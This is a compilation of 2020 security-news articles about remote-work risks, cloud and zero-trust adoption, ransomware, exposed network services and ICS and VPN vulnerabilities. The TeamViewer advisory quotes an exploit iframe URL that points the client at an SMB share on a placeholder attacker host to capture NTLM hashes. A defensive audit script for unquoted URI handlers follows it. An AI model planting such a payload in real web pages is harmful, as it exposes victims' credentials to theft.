2021 predictions for the Everywhere Enterprise

As we near 2021, it seems that the changes to our working life that came about in 2020 are set to remain. Businesses are transforming as companies continue to embrace remote working practices to adhere to government guidelines. What does the next year hold for organizations as they continue to adapt in the age of the Everywhere Enterprise?

We will see the rush to the cloud continue

The pandemic saw more companies than ever move to the cloud as they sought collaboration and productivity tools for employee bases working from home. We expect that surge to continue as more companies realize the importance of the cloud in 2021. Businesses are prepared to preserve these new working models in the long term, some perhaps permanently: Google urged employees to continue working from home until at least next July and Twitter stated employees can work from home forever if they prefer.

Workforces around the world need to continue using alternatives to physical face-to-face meetings, and remote collaboration tools will help. Cloud-based tools are perfect for that kind of functionality, which is partly why many customers that are not in the cloud want to be. The customers who already started the cloud migration journey are also moving more resources to public cloud infrastructure.

People will be the new perimeter

While people will eventually return to the office, they won’t do so full-time, and they won’t return in droves. This shift will close the circle on a long trend that has been building since the mid-2000s: the dissolution of the network perimeter. The network and the devices that defined its perimeter will become even less special from a cybersecurity standpoint.

Instead, people will become the new perimeter. Their identity will define what they’re allowed to access, both inside and outside the corporate network. Even when they are logged into the network, they will have minimal access to resources until they and the device they are using have been authenticated and authorized. This approach, known as zero trust networking, will pervade everything, covering not just employees, but customers, contractors, and other business partners.

User experience will be increasingly important in remote working

Happy, productive workers are even more important during a pandemic, especially as employees are, on average, working three hours longer since the pandemic started, disrupting the work-life balance. It’s up to employers to focus on the user experience and make workers’ lives as easy as possible.

When the COVID-19 lockdown began, companies coped by expanding their remote VPN usage. That got them through the immediate crisis, but it was far from ideal. On-premises VPN appliances suffered a capacity crunch as they struggled to scale, creating performance issues, and users found themselves dealing with cumbersome VPN clients and log-ins. It worked for a few months, but as employees settle in to continue working from home in 2021, IT departments must concentrate on building a better remote user experience.

Old-school remote access mechanisms will fade away

This focus on the user experience will change the way that people access computing resources. In the old model, companies used a full VPN to tunnel all traffic via the enterprise network. This introduced latency issues, especially when accessing applications in the cloud because it meant routing all traffic back through the enterprise data center.

It’s time to stop routing cloud sessions through the enterprise network. Instead, companies should allow remote workers to access them directly. That means either sanitizing traffic on the device itself or in the cloud.

User authentication improvements

Part of that new approach to authentication involves better user verification. That will come in two parts. First, it’s time to ditch the password. The cybersecurity community has advocated this for a long time, but the work-from-home trend will accelerate it. Employees accessing from mobile devices are increasingly using biometric authentication, which is more secure and convenient.

The second improvement to user verification will see people logging into applications less often. Sessions will persist for longer, based on deep agent-based device knowledge that will form a big part of the remote access experience.

Changing customer interactions will require better mobile security

It isn’t just employees who will need better mobile security. Businesses will change the way that they interact with customers too. We can expect fewer person-to-person interactions in retail as social distancing rules continue. Instead, contact-free transactions will become more important and businesses will move to self-checkout options. Retailers must focus more on mobile devices for everything from browsing products, to ordering and payment.

The increase in QR codes presents a great threat

Retailers and other companies are already using QR codes, and will continue to use them more and more, to bridge contact with things like menus and payment systems, as well as to comply with social distancing rules. Users can scan them from two meters away, making them perfect for payments and product information.

The problem is that they were never designed for these applications or digital authentication and can easily be replaced with malicious codes that manipulate smartphones in unexpected and damaging ways. We can expect to see QR code fraud problems increase as the usage of these codes expands in 2021.

The age of the Everywhere Enterprise

One overarching message came through clearly in our conversations with customers: the enterprise changed for the longer term in 2020, and this will have profound effects in 2021. What began as a rushed reaction during a crisis this year will evolve during the next as the IT department joins HR in rethinking employee relationships in the age of the everywhere enterprise.

If 2020 was the year that businesses fell back on the ropes, 2021 will be the one where they bounce forward, moving from a rushed reaction into a thoughtful, measured response.

Accept your IT security limits and call in the experts

For many employees, the COVID-19 pandemic brought about something they dreamed of for years: the possibility to eschew long commutes, business attire and (finally!) work from their home.

Companies were forced to embrace the work-from-home switch and many are now starting to like the cost savings and the possibility to hire employees from a wider, non-localized pool of applicants.

But for IT security teams, the switch meant even more work and a struggle to find new ways to keep their organization and their employees secure from an increasing number and frequency of cyber threats.

The pressure to deliver security is on

A recent LogMeIn report has also revealed that the transition to remote work for the majority of businesses has impacted the day-to-day work of IT professionals.

Aside from the expected technical tasks and an increased number of web meetings, over half of them have been forced to spend more time managing IT security threats and developing new security protocols. In fact, the percentage of IT professionals who are now spending 5 to 8 hours per day on IT security rose from 35 in 2019 to 47 in 2020.

“In terms of defensive tactics, the first two months of the pandemic shifted the previous network-centric thinking to endpoint and remote access. Many firms lacking endpoint detection and response or endpoint protection (next-gen AV) sought to roll out these services across their distributed organization. They also focused on IAM and VPN or SDP services,” Mark Sangster, VP and Industry Security Strategist at eSentire, told Help Net Security.

“The other shift moved thinking from BYOD to BYOH: Bring Your Office Home. Firms were faced with the challenge of securing connections from home offices made through consumer-grade networking gear provided by employee ISPs. These systems are not as hardened as commercial-grade internet devices and were often misconfigured or left in factory settings with default administrative credentials and wide-open Wi-Fi services. This effort required IT teams to help non-technical employees harden their home routers, better understand password security and embrace the necessity for multi-factor authentication and VPNs.”

Solving the security puzzle

Companies’ tech priorities have shifted as well, with many increasing spending for security.

But the need to implement new technology, the widening attack surface, and the onslaught of ransomware-wielding gangs have forced some companies to accept the limits of what they can do with in-house IT security staff and technology, and to seek additional assistance from outside detection and response experts.

The threat of ransomware is insidious and can be particularly destructive, delivering a potentially fatal blow to some (often smaller) organizations.

“Firms need to understand the risks and prepare with proactive defenses (threat hunting), hot-swappable back-ups and fail-over colocation systems. The real trick is catching unauthorized activity quickly, before criminal groups are able to plant ransomware throughout the organization, steal data and then launch a synchronized attack to cripple the organization. This means being able to monitor VPN traffic (connections) and remote administrative activities to detect unauthorized movement,” Sangster explained.

“Criminal groups steal credentials to then access the business using remote tools. This MO is detectable, but it requires proactive hunting and constant monitoring of these services. We have stopped multiple attacks of this nature. In those cases, the ransom attack was either isolated to a single device (and quickly recovered in less than an hour), or it required coordinated defenses to block remote attacks through remote admin tools like Microsoft RDP or PowerShell. In these cases, machine learning flagged suspicious activity for further investigation by security analysts. This quick response meant dwell time was only minutes and prevented the criminal gang ransomware from metastasizing throughout the organization.”

Making history: The pandemic, disaster recovery and data protection

It was an accomplishment for the ages: within just a couple of days, IT departments hurriedly provided millions of newly homebound employees online access to the data and apps they needed to remain productive.

Some employees were handed laptops as they left the building, while others made do with their own machines. Most connected to their corporate services via VPNs. Other companies harnessed the cloud and software and infrastructure services (SaaS, IaaS).

Bravo, IT! Not only did it all work, businesses and employees both saw the very real benefits of remote life, and that egg is not going back into the shell. Many won’t return to those offices and will continue work from home.

But while immediate access challenges were answered, this was not a long-term solution.

Let’s face it, because of the pandemic a lot of companies were caught off guard with insufficient plans for data protection and disaster recovery (DR). That isn’t easy in the best of times, never mind during a pandemic. Even those with effective strategies now must revisit and update them. Employees have insufficient home security. VPNs are difficult to manage and provision, perform poorly and are hard to scale. And, IT’s domain is now stretched across the corporate data center, cloud (often more than one), user endpoints and multiple SaaS providers.

There’s a lot to do. A plan that fully covers DR, data protection and availability is a must.

Local focus

There are several strategies for protecting endpoints. First off, if employees are using company-issued machines, there are many good mobile machine management products on the market. Sure, setting up clients for a volume of these will be a laborious task, but you’ll have peace of mind knowing data won’t go unprotected.

Another strategy is to create group policies that map the Desktop and My Documents folders directly to the cloud file storage of your choice, no matter if it’s Google Drive, OneDrive, Dropbox or some other solution. That can simplify file data protection but its success hinges on the employee storing documents in the right place. And if they keep them on their desktop, for example, they’re not going to be protected.

And right there is the rub with protecting employee machines – employees are going to store data on these devices. Often, insecure home Internet connections make these devices and data vulnerable. Further, if you add backup clients and/or software to employee-owned machines, you could encounter some privacy resistance.

Remote desktops can provide an elegant solution. We’ve heard “this is the year of virtual desktop infrastructure (VDI)” for over a decade. It’s something of a running joke in IT circles, but you know what? The current scenario could very well make this the year of remote desktops after all.

VDI performance in more sophisticated remote desktop solutions has greatly improved. With a robust platform configured properly, end-users can’t store data on their local machines – it’ll be safely kept behind a firewall with on-premises backup systems to protect and secure it.

Further, IT can set up virtual desktops to prevent cut and paste to the device. And because many solutions don’t require a client, it doesn’t matter what machine an employee uses – just make sure proper credentials are needed for access and include multi-factor authentication.

Pain in the SaaS

As if IT doesn’t have enough to worry about, there’s a potential SaaS issue that can cause a lot of pain. Most providers operate under the shared responsibility model. They secure infrastructure, ensure apps are available and data is safe in case of a large-scale disaster. But long-term, responsibility for granular protection of data rests on the shoulders of the customer.

Unfortunately, many organizations are unprepared. A January 2020 survey from OwnBackup of 2,000 Salesforce users found that 52% are not backing up their Salesforce data.

What happens if someone mistakenly deletes a Microsoft Office 365 document vital for a quarterly sales report and it’s not noticed for a while? Microsoft automatically empties recycle bin data after 30 days, so unless there’s backup in place, it’s gone for good.

Backup vendors provide products to protect data in most of the more common SaaS services, but if there’s not a data protection solution for one your organization is using, make data protection part of the service provider’s contract and insist they regularly send along copies of your data.

Making history

When it comes to a significant disaster, highly distributed environments can make recovery difficult. The cloud seems like a clear choice for storing DR and backup data, but while the commodity cloud providers make it easy and cheap to upload data, costs for retrieval are much higher. Also, remember that cloud recovery is different from on-prem, requiring expertise in areas like virtual machines and user access. And, if IT is handling cloud directly and has issues, keep in mind that it could be very difficult getting support.

During a disaster, you want to recover fast; you don’t want to be creating a backup and DR strategy as the leadership grits their teeth due to downtime. So, set your data protection strategy now, be sure each app is included, follow all dependencies and test over and over again. Employees and data may be in varied locations, so be sure you’re completely covered so your company can get back in the game faster.

While IT pulled off an amazing feat handling a rapid remote migration, to ensure your company’s future, you need to be certain it can protect data, even outside of the corporate firewall. With a backup and DR strategy for dispersed data in place, you’ll continue to be in a position to make history, instead of fading away.

Adapt cybersecurity programs to protect remote work environments

Earlier this year, businesses across the globe transitioned to a remote work environment almost overnight at unprecedented scale and speed. Security teams worked around the clock to empower and protect their newly distributed teams.

Protect and support a remote workforce

Cisco’s report found the majority of organizations around the world were at best only somewhat prepared in supporting their remote workforce. But, it has accelerated the adoption of technologies that enable employees to work securely from anywhere and on any device – preparing businesses to be flexible for whatever comes next. The survey found that:

  • 85% of organizations said that cybersecurity is extremely important or more important than before COVID-19
  • Secure access is the top cybersecurity challenge faced by the largest proportion of organizations (62%) when supporting remote workers
  • One in two respondents said endpoints, including corporate laptops and personal devices, are a challenge to protect in a remote environment
  • 66% of respondents indicated that the COVID-19 situation will result in an increase in cybersecurity investments

“Security and privacy are among the most significant social and economic issues of our lifetime,” said Jeetu Patel, SVP and GM of Cisco’s Security & Applications business.

“Cybersecurity historically has been overly complex. With this new way of working here to stay and organizations looking to increase their investment in cybersecurity, there’s a unique opportunity to transform the way we approach security as an industry to better meet the needs of our customers and end-users.”

People worried about the privacy of their tools

People are worried about the privacy of remote work tools and are skeptical whether companies are doing what is needed to keep their data safe. Despite the pandemic, they want little or no change to privacy requirements, and they want to see companies be more transparent regarding how they use their customers’ data.

Organizations have the opportunity to build confidence and trust by embedding privacy into their products and communicating their practices clearly and simply to their customers. The survey found that:

  • 60% of respondents were concerned about the privacy of remote collaboration tools
  • 53% want little or no change to existing privacy laws
  • 48% feel they are unable to effectively protect their data today, and the main reason is that they can’t figure out what companies are doing with their data
  • 56% believe governments should play a primary role in protecting consumer data, and consumers are highly supportive of the privacy laws enacted in their country

“Privacy is much more than just a compliance obligation. It is a fundamental human right and business imperative that is critical to building and maintaining customer trust,” said Harvey Jang, VP, Chief Privacy Officer, Cisco. “The core privacy and ethical principles of transparency, fairness, and accountability will guide us in this new, digital-first world.”

Organizations with remote workforces need new security solutions

Remote work has left many organizations lagging in productivity and revenue due to remote access solutions. 19% of IT leaders surveyed said they often or always experience network performance and latency issues when using legacy remote access solutions, with an additional 43% saying they sometimes do.

Those issues have resulted in a loss of productivity for 68% of respondents and a loss of revenue for 43%, a Perimeter 81 report reveals.

According to the report, organizations securely connect to internal networks in a variety of ways when working remotely. Some 66% reported using VPNs, 58% said they use a cloud service through a web browser, 48% rely on a remote access solution, and 34% use a firewall.

The many organizations still using legacy solutions like VPNs and firewalls will struggle to scale, face bottlenecks, and lack network visibility.

33% of respondents said a password is the only way they authenticate themselves to gain access to systems. And while 62% of IT managers said they are using cloud-based security solutions to secure remote access, 49% said they’re still using a firewall, and 41% a hardware VPN.

But there are signs of progress, as organizations increasingly favor modern cloud-based solutions over outdated legacy solutions. Following the pandemic and a switch to remote work, 72% of respondents said they’re very or completely likely to increase adoption of cloud-based security solutions, 38% higher than before the pandemic.

“With today’s increasingly distributed and mobile workforce, the traditional and perimeter-based network model no longer makes sense,” said Perimeter 81 CEO Amit Bareket.

“It’s no surprise that companies are increasingly moving to cloud-based cyber and network security platforms. As corporations of all sizes rely on the cloud to run their businesses, they need new ways of consuming security to effectively prevent cyberattacks regardless of their location or network environment.”

Other key findings

  • 74% of respondents are adopting cloud-based security solutions over hardware due to security concerns. 44% are doing so due to scalability concerns, and 43% cited time-saving considerations.
  • 61% of organizations believe that having to protect new devices is the greatest security concern in light of remote work, while 56% said their greatest concern was lack of visibility into remote user activity.
  • 39% of respondents reported that scalability is their greatest challenge in securing the remote workforce, while 38% said budget allocation was their greatest challenge.

Companies continue to expose unsafe network services to the internet

33% of companies within the digital supply chain expose common network services such as data storage, remote access and network administration to the internet, according to RiskRecon. In addition, organizations that expose unsafe services to the internet also exhibit more critical security findings.

The research is based on an assessment of millions of internet-facing systems across approximately 40,000 commercial and public institutions. The data was analyzed in two strategic ways: the direct proportion of internet-facing hosts running unsafe services, as well as the percentage of companies that expose unsafe services somewhere across their infrastructure.

The research concludes that the impact is further heightened when vendors and business partners run unsafe, exposed services used by their digital supply chain customers.

“Blocking internet access to unsafe network services is one of the most basic security hygiene practices. The fact that one-third of companies in the digital supply chain are failing at one of the most basic cybersecurity practices should serve as a wake-up call to executives and third-party risk management teams,” said Kelly White, CEO, RiskRecon.

“We have a long way to go in hardening the infrastructure that we all depend on to safely operate our businesses and protect consumer data. Risk managers will be well served to leverage objective data to better understand and act on their third-party risk.”

Expose unsafe network services: Key findings

  • 33% of organizations expose one or more unsafe services across hosts under their control. As such, admins should either eliminate direct internet access or deploy compensating controls for when/if such services are required.
  • Direct internet access to database services should be prohibited or secured. Within the top three unsafe network services, datastores, such as S3 buckets and MySQL databases are the most commonly exposed.
  • Digital transformation and the shift to remote work need to be considered. Remote access is the second most commonly exposed service; admins should consider restricting the accessibility of these services only to authorized and internal users.
  • Universities are woefully exposed. With a culture that boasts open access to information and collaboration, the education sector has the greatest tendency to expose unsafe network services on non-student systems, with 51.9% of universities running unsafe services.
  • Global regions lack proper security posture. Countries such as the Ukraine, Indonesia, Bulgaria, Mexico and Poland confirm the highest rate of domestically-hosted systems running unsafe services.
  • Beware of ElasticSearch and MongoDB. Firms that expose these services to the internet have a 4x to 5x higher rate of severe security findings than those who do not run on internet-facing hosts.
  • Unsafe services uncover other security issues. Failing to patch software and implement web encryption are two of the most prevalent security findings associated with unsafe services.

“This research should be welcome news to organizations struggling under the pressure to conduct exhaustive and time-consuming security assessments of their external business partners,” said Jay Jacobs, partner, Cyentia Institute.

“Similar to how medical doctors diagnose illnesses through various outward signs exhibited by their patients, third-party risk programs can perform quick, reliable diagnostics to identify underlying cybersecurity ailments.

“Not only is the presence of unsafe network services a problem in itself, but the data we examine in this report also shows that they’re a symptom of broader problems. Easy, reliable risk like this offer a rare quick win for risk assessments.”

Bring your own PC and SASE security to transform global businesses

Bring your own PC (BYOPC) security will reach mainstream adoption in the next two to five years, while it will take five to 10 years for mainstream adoption of secure access service edge (SASE) to take place, according to Gartner. Hype cycle for endpoint security, 2020 “Prior to the COVID-19 pandemic, there was little interest in BYOPC,” said Rob Smith, senior research director at Gartner. “At the start of the pandemic, organizations simply had no … More

The post Bring your own PC and SASE security to transform global businesses appeared first on Help Net Security.

A look at enterprise network and application modernization efforts

80% of organizations are struggling to reach application delivery requirements with their existing infrastructure. But, amid pandemic concerns, efforts to modernize networks and applications to address this challenge are accelerating with 83% reporting budget increases for these initiatives over the next three years, NS1 reveals.

“Modernization was already on the radar for many organizations, but the pandemic has shocked the system and created a heightened sense of urgency,” said Kris Beevers, CEO, NS1. “Our research shows that IT leaders are accelerating projects aimed to increase efficiencies and business agility, improve application performance and user experiences, and drive additional revenue.”

Challenges to enterprise network and application modernization efforts

Within the broad scope of IT modernization, companies are prioritizing transformation initiatives for mobility (70%), remote data access (68%), automation (65%), security (61%), and IT resilience (60%).

Other areas where efforts are accelerating include public and private cloud deployments (58% and 57% respectively), improvements to scalability (58%) and deployment velocity (56%).

And yet, even with the heightened sense of urgency and budget behind them, survey respondents reported facing a number of obstacles in their IT modernization projects. Although four out of five acknowledge some progress with modernization, only 8% report that they have achieved their initial objectives, and 28% report “significant progress” (75% or greater).

Challenges to modernization include a talent and skills gap and competing priorities (37% each), as well as aging networks (35%) and the outdated, inflexible organizational structures that often come with them.

“Static, legacy tech drags down modernization efforts because it lacks the flexibility and agility necessary to support dynamic, scalable applications and IT environments,” added Beevers.

“Successful digital transformation starts with the underlying enterprise network and application infrastructure — DNS, DHCP and IP address management. When purpose-built for speed, reliability and scalability, these foundational technologies are critical in expediting modernization projects, automating network management tasks, and increasing efficiency and operational velocity in complex heterogeneous environments.”

Adoption and trends in the modern IT landscape

The study examined the adoption of modern technology across mid- to large-sized companies and uncovered the following trends.

The study found that 45% of respondents are currently using DDI, and another 48% plan to adopt the technology within 12 months. Adopters reported the most common use cases to be accelerating service discovery in microservices environments (60%) and connecting cloud and on-premise applications and data (56%).

Those with plans to implement DDI cited the following use cases as the most appealing:

  • Connecting cloud and on-premise applications and data (59%)
  • Accelerating application delivery (55%)
  • Automating network management tasks (54%)
  • Accelerating service discovery in microservices environments (42%)
  • Controlling costs associated with application and network management (40%)

Modern application stack

Nearly all companies are adopting modern application stack solutions, many of which are aimed directly at addressing network and application performance requirements, including:

  • Network monitoring tools, which 96% of respondents were either already implementing or planning to, within 12 months
  • Public/private cloud, multi-cloud – 94%
  • Automation and orchestration solutions – 93%
  • Intelligent traffic management – 87%
  • Multi-CDN – 85%

Most ICS vulnerabilities disclosed this year can be exploited remotely

More than 70% of ICS vulnerabilities disclosed in the first half of 2020 can be exploited remotely, highlighting the importance of protecting internet-facing ICS devices and remote access connections, according to Claroty.

The report comprises The Claroty Research Team’s assessment of 365 ICS vulnerabilities published by the National Vulnerability Database (NVD) and 139 ICS advisories issued by the Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) during 1H 2020, affecting 53 vendors. The research team discovered 26 of the vulnerabilities included in this data set.

Compared to 1H 2019, ICS vulnerabilities published by the NVD increased by 10.3% from 331, while ICS-CERT advisories increased by 32.4% from 105. More than 75% of vulnerabilities were assigned high or critical Common Vulnerability Scoring System (CVSS) scores.

“There is a heightened awareness of the risks posed by ICS vulnerabilities and a sharpened focus among researchers and vendors to identify and remediate these vulnerabilities as effectively and efficiently as possible,” said Amir Preminger, VP of Research at Claroty.

“We recognized the critical need to understand, evaluate, and report on the comprehensive ICS risk and vulnerability landscape to benefit the entire OT security community.

“Our findings show how important it is for organizations to protect remote access connections and internet-facing ICS devices, and to protect against phishing, spam, and ransomware, in order to minimize and mitigate the potential impacts of these threats.”

Prominence of RCE vulns highlights need to protect internet-facing ICS devices

According to the report, more than 70% of the vulnerabilities published by the NVD can be exploited remotely, reinforcing the fact that fully air-gapped ICS networks that are isolated from cyber threats have become extremely uncommon.

Additionally, the most common potential impact was remote code execution (RCE), possible with 49% of vulnerabilities – reflecting its prominence as the leading area of focus within the OT security research community – followed by the ability to read application data (41%), cause denial of service (DoS) (39%), and bypass protection mechanisms (37%).

The prominence of remote exploitation has been exacerbated by the rapid global shift to a remote workforce and the increased reliance on remote access to ICS networks in response to the COVID-19 pandemic.


Vulnerabilities on the rise

The energy, critical manufacturing, and water & wastewater infrastructure sectors were by far the most impacted by vulnerabilities published in ICS-CERT advisories during 1H 2020.

Of the 385 unique Common Vulnerabilities and Exposures (CVEs) included in the advisories, energy had 236, critical manufacturing had 197, and water & wastewater had 171. Compared to 1H 2019, water & wastewater experienced the largest increase of CVEs (122.1%), while critical manufacturing increased by 87.3% and energy by 58.9%.

Assessment of ICS vulnerabilities discovered

The research team discovered 26 ICS vulnerabilities disclosed during 1H 2020, prioritizing critical or high-risk vulnerabilities that could affect the availability, reliability, and safety of industrial operations.

The team focused on ICS vendors and products with vast install bases, integral roles in industrial operations, and those that utilize protocols in which researchers have considerable expertise. These 26 vulnerabilities could have serious impacts on affected OT networks, because more than 60% enable some form of RCE.

SD-WAN: A key enabler for remote workforces and enhanced security

For the third year, SD-WAN adoption continues to grow, with ever-increasing interest in managed and co-managed offerings to navigate the complexities of an integrated network and security solution, Masergy reveals.


Single strategy

The timing of the survey during the global pandemic uncovered the challenges posed in a work-from-home environment with security and business continuity rising as top priorities.

The study analyzes responses from IT decision makers in global enterprises across a variety of industries. Findings reveal that security and network infrastructure are the top two areas of focus to ensure business continuity and enable remote work.

Converging the network and security into a single strategy is also important today, as is having a managed service provider for assistance.

SD-WAN adoption: Key findings

  • Enabling remote work and collaboration tools are now top IT investments with 44 percent of respondents prioritizing the support of their homebound workforces.
  • 64 percent of survey participants report they are investing more in network infrastructure than they did last quarter, and SD-WAN adoption trends have continued to rise with each study. This year, 56 percent of respondents said they are piloting, installing, or upgrading SD-WAN installations. In 2017, that number was 35 percent.
  • Security remains an overwhelming focus with 91 percent of survey participants expressing interest in services that converge SD-WAN and security – also known as secure access service edge (SASE) solutions.
  • Multi-cloud connectivity ranks as the top SD-WAN capability (66 percent) as IT leaders look to address the challenges of cloud application performance and communications continuity.
  • Enterprises are shifting more toward wanting a managed SD-WAN solution with 45 percent opting for a fully-managed approach, and 29 percent opting for co-managed, while just 25 percent prefer a do-it-yourself approach.


“With working from home emerging as the ‘new normal,’ supporting remote workers has increased the urgency with which IT departments are approaching their network, security, and cloud infrastructures,” said Becky Carr, CMO, Masergy.

“As such, it is not surprising to see the transformative impact of SD-WAN and SASE solutions become the new necessity for achieving secure remote access and reliable performance for cloud applications.”

TeamViewer flaw could be exploited to crack users’ passwords

A high-risk vulnerability (CVE-2020-13699) in TeamViewer for Windows could be exploited by remote attackers to crack users’ passwords and, consequently, lead to further system exploitation.


About TeamViewer

TeamViewer is an application developed by German company TeamViewer GmbH and is available for Windows, macOS, Linux, Chrome OS, iOS, Android, Windows RT, Windows Phone 8 and BlackBerry operating systems.

It is used primarily for remote access to and control of various types of computer systems and mobile devices, but also offers collaboration and presentation features (e.g., desktop sharing, web conferencing, file transfer).

Since the advent of COVID-19, enterprise use of the software has increased due to many employees being forced to work from home.

About the vulnerability (CVE-2020-13699)

CVE-2020-13699 is a security weakness arising from an unquoted search path or element – more specifically, it’s due to the application not properly quoting its custom URI handlers – and could be exploited when the system with a vulnerable version of TeamViewer installed visits a maliciously crafted website.

“An attacker could embed a malicious iframe in a website with a crafted URL (iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs') that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share,” explained Jeffrey Hofmann, a security engineer with Praetorian, who discovered and responsibly disclosed the flaw.

“Windows will perform NTLM authentication when opening the SMB share and that request can be relayed (using a tool like responder) for code execution (or captured for hash cracking).”

As noted before, exploitation of the flaw can be initiated remotely and requires no previous authentication. The flaw seems ideal for targeted watering hole attacks.

There is no indication that this vulnerability is being exploited in the wild and no public exploit is currently available.

CIS assesses that the risk of exploitation is high for large and medium government and business entities, medium for small government and business entities, and low for home users.

According to the company, the vulnerability affects TeamViewer versions 8 through 15 (up to 15.8.2) for the Windows platform. Users are advised to upgrade to version 15.8.3 to close the hole.
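The root cause described above, a URI handler whose command template does not quote the URL placeholder, can be audited on any Windows fleet. The following is an added example, not code from TeamViewer or Praetorian: it assumes handler command strings exported from `HKEY_CLASSES_ROOT\<scheme>\shell\open\command`, and the sample templates, the `exampleapp` schemes and the sample URL are constructed for illustration.

```python
"""Audit URI-handler command templates for an unquoted %1 placeholder."""

# Constructed sample data: scheme -> command template. Executable paths and
# the "exampleapp-*" schemes are hypothetical; "teamviewer10" is the scheme
# named in the article, shown here in an illustrative unquoted form.
SAMPLE_HANDLERS = {
    "teamviewer10": r'"C:\Program Files (x86)\TeamViewer\TeamViewer.exe" %1',
    "exampleapp-ok": r'"C:\Program Files\ExampleApp\app.exe" "%1"',
    "exampleapp-flag": r'"C:\Program Files\ExampleApp\app.exe" --open %1',
    "exampleapp-static": r'"C:\Program Files\ExampleApp\app.exe" --version',
}

# Constructed, harmless URL containing spaces and a switch-like token.
SAMPLE_URL = "exampleapp:one --two three"

PLACEHOLDER = "%1"


def unquoted_placeholder_offsets(command):
    """Return the offset of every %1 that sits outside a double-quoted span."""
    offsets = []
    in_quotes = False
    i = 0
    while i < len(command):
        if command[i] == '"':
            in_quotes = not in_quotes
        elif command.startswith(PLACEHOLDER, i):
            if not in_quotes:
                offsets.append(i)
            i += len(PLACEHOLDER)
            continue
        i += 1
    return offsets


def split_args(command_line):
    """Simplified Windows-style split: whitespace separates arguments unless
    it is inside double quotes (backslash escape rules are ignored)."""
    args, current, in_quotes, started = [], [], False, False
    for ch in command_line:
        if ch == '"':
            in_quotes = not in_quotes
            started = True
        elif ch in " \t" and not in_quotes:
            if started:
                args.append("".join(current))
                current, started = [], False
        else:
            current.append(ch)
            started = True
    if started:
        args.append("".join(current))
    return args


def expand(command, url):
    """Substitute the URL into the template and return the resulting argv."""
    return split_args(command.replace(PLACEHOLDER, url))


def audit(handlers):
    """Return the schemes whose template leaves %1 unquoted."""
    return [scheme for scheme, command in sorted(handlers.items())
            if unquoted_placeholder_offsets(command)]


if __name__ == "__main__":
    for scheme in audit(SAMPLE_HANDLERS):
        argv = expand(SAMPLE_HANDLERS[scheme], SAMPLE_URL)
        # With an unquoted %1 the URL is split into several arguments, so
        # text after a space is parsed by the application as its own options.
        print(f"{scheme}: unquoted %1, URL expands to {len(argv) - 1} arguments")
```

Quoting the placeholder keeps the whole URL in a single argument; the application still has to validate what that argument contains.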

Many companies have not taken basic steps to protect their remote workforce

New research shows almost three quarters of large businesses believe remote working policies introduced to help stop the spread of COVID-19 are making their companies more vulnerable to cyberattacks.

You need to take steps to protect the remote workforce

AT&T’s study of 800 cybersecurity professionals across the UK, France and Germany shows that while 88% initially felt well prepared for the migration, 55% now believe widespread remote working is making their companies more or much …


Researchers find critical RCE vulnerabilities in industrial VPN solutions

Critical vulnerabilities in several industrial VPN implementations for remotely accessing operational technology (OT) networks could allow attackers to overwrite data, execute malicious code or commands, cause a DoS condition, and more.


“Exploiting these vulnerabilities can give an attacker direct access to the field devices and cause some physical damage,” Claroty researchers noted.

The vulnerabilities

Since COVID-19 stepped on the global stage, enterprise-grade VPN installations have become a must for any organization that relies on a remote workforce. Simultaneously, they’ve become great targets for criminals looking for a way into companies’ IT networks and assets.

This situation has spurred the researchers to search for vulnerabilities in industrial VPN solutions used by remote operators and third-party vendors for accessing, maintaining and monitoring field controllers, programmable logic controllers (PLCs) and input/output (IO) devices deployed at oil and gas installations, water utilities and electric utilities.

These include Secomea’s GateManager M2M Server, Moxa’s industrial VPN servers with an all-in-one secure router, and HMS Networks’s eCatcher VPN client.

Secomea’s GateManager, which is an ICS remote access server deployed worldwide as a cloud-based SaaS solution with many general-purpose and white-label instances deployed, has been found to have several flaws, all pretty serious:

  • CVE-2020-14500 – arising from the improper handling of some of the HTTP request headers provided by the client, it could be exploited – remotely and without authentication – to execute malicious code and effectively gain access to a customer’s internal network
  • CVE-2020-14508 – an off-by-one error bug that may allow an attacker to achieve RCE or cause a DoS condition
  • CVE-2020-14510 – hardcoded telnet credentials
  • CVE-2020-14512 – weak hash type that could reveal users’ passwords

Moxa’s EDR-G902 and EDR-G903 series secure routers/VPN servers sport a stack-based buffer overflow bug (CVE-2020-14511) that could lead to RCE.

Finally, there’s a stack-buffer overflow bug (CVE-2020-14498) in HMS Networks’ eCatcher, a proprietary VPN client that is used to connect to the company’s eWon VPN device, which allows machine builders and factory owners to remotely monitor the performance of their equipment.

This bug can be triggered by tricking targets into visiting a malicious website or opening a malicious email with a specifically crafted HTML element.

“By sending socially engineered emails that embed specifically crafted images capable of exploiting CVE-2020-14498, an attacker could execute code with the highest privileges and completely take over a victim’s machine just by making the victim view the malicious email,” the researchers demonstrated.

“The exploitation phase occurs immediately when the email client (e.g. Outlook) is loading the malicious images.”

What’s next?

The good news is that all of these flaws have been patched. The bad news is there are surely more of them that have yet to be unearthed, possibly by individuals with malicious intent.

With ransomware attackers increasingly looking for ways to disrupt mission-critical systems to force companies to pay hefty sums, we can predict that, sooner or later, they will exploit vulnerabilities in OT-specific solutions.

“We would also like to emphasize that these vulnerabilities reinforce the unique risks inherent to OT remote access,” the researchers noted.

“While the security features of most VPNs make them generally well-suited and secure for IT remote access, such features tend to be less comprehensive than the stringent role- and policy-based administrative controls and monitoring capabilities required to secure OT remote access connections and minimize the risks introduced by employees and third-parties.”

Surge in unique clients reporting brute-force attack attempts

There’s a significant uptick in the number of unique clients who have reported brute-force attack attempts, ESET reveals.


Trend of RDP attack attempts against unique clients (per day) detected by ESET

The trend has been observed since the onset of the global pandemic. The COVID-19 crisis has radically changed the nature of everyday work, forcing employees to manage large parts of their jobs via remote access.

Cybercriminals exploiting remote work

Cybercriminals – especially ransomware operators – are aware of the shift and attempt to exploit the new opportunities and increase their illicit earnings. In the period between January 2020 and May 2020, the United States, China, Russia, Germany and France topped the list of countries with most IPs used for brute-force attacks.

“Before the lockdown, most employees worked from the office and used infrastructure monitored and controlled by their IT department. But the coronavirus pandemic has brought a major shift to the status quo.

“Today, a huge proportion of ‘office’ work occurs via home devices, with workers accessing sensitive company systems through Windows’ Remote Desktop Protocol (RDP), a proprietary solution created by Microsoft to allow connecting to the corporate network from remote computers,” explains Ondrej Kubovič, ESET Security Research & Awareness Specialist.

“Despite the increasing importance of RDP, as well as other remote access services, organizations often neglect its settings and protection. Employees use easy-to-guess passwords, and without additional layers of authentication or protection, there is little that can stop cybercriminals from compromising an organization’s systems,” Kubovič continues.

